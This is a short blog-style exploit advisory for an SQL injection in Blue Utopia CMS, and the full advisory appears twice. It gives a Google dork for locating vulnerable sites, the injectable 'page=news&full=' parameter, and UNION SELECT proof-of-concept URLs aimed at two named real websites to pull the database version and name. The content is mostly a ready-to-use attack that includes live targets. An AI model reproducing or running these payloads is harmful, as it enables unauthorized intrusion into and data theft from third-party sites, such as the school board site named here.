on
tutorial
- Get link
- Other Apps
- Get link
- Other Apps
[o] Blue Utopia CMS SQL Injection Vulnerability
Software : Blue Utopia CMS
Vendor : http://blueutopia.com/
Dork : "Powered by Blue Utopia"
Author : NoGe
[o] Exploit
http://localhost/[path]/index.php?page=news&full=[SQLi}
[o] PoC
http://www.geaugadems.org/index.php?page=news&full=-1071+union+select+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15--
http://buetowforschoolboard.com/index.php?page=news&full=-2+union+select+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15--
[o] Note
this is a private script
all in one server
vendor already notified
bug has been fixed by vendor! :))
Software : Blue Utopia CMS
Vendor : http://blueutopia.com/
Dork : "Powered by Blue Utopia"
Author : NoGe
[o] Exploit
http://localhost/[path]/index.php?page=news&full=[SQLi}
[o] PoC
http://www.geaugadems.org/index.php?page=news&full=-1071+union+select+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15--
http://buetowforschoolboard.com/index.php?page=news&full=-2+union+select+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15--
[o] Note
this is a private script
all in one server
vendor already notified
bug has been fixed by vendor! :))
Comments